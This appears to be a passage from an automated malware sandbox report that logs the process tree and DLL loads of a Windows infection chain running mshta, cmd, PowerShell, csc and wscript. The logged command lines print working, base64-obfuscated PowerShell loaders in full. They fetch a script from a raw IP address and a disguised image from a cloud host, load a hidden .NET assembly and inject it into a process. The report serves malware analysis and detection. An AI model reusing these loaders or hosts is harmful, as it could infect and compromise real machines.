2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $AngelJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES254C.tmp" "c:\Users\user\AppData\Local\Temp\otto1awr\CSCDFB69145189A40B197F122BC8548BE9C.TMP"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel
            Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: webio.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
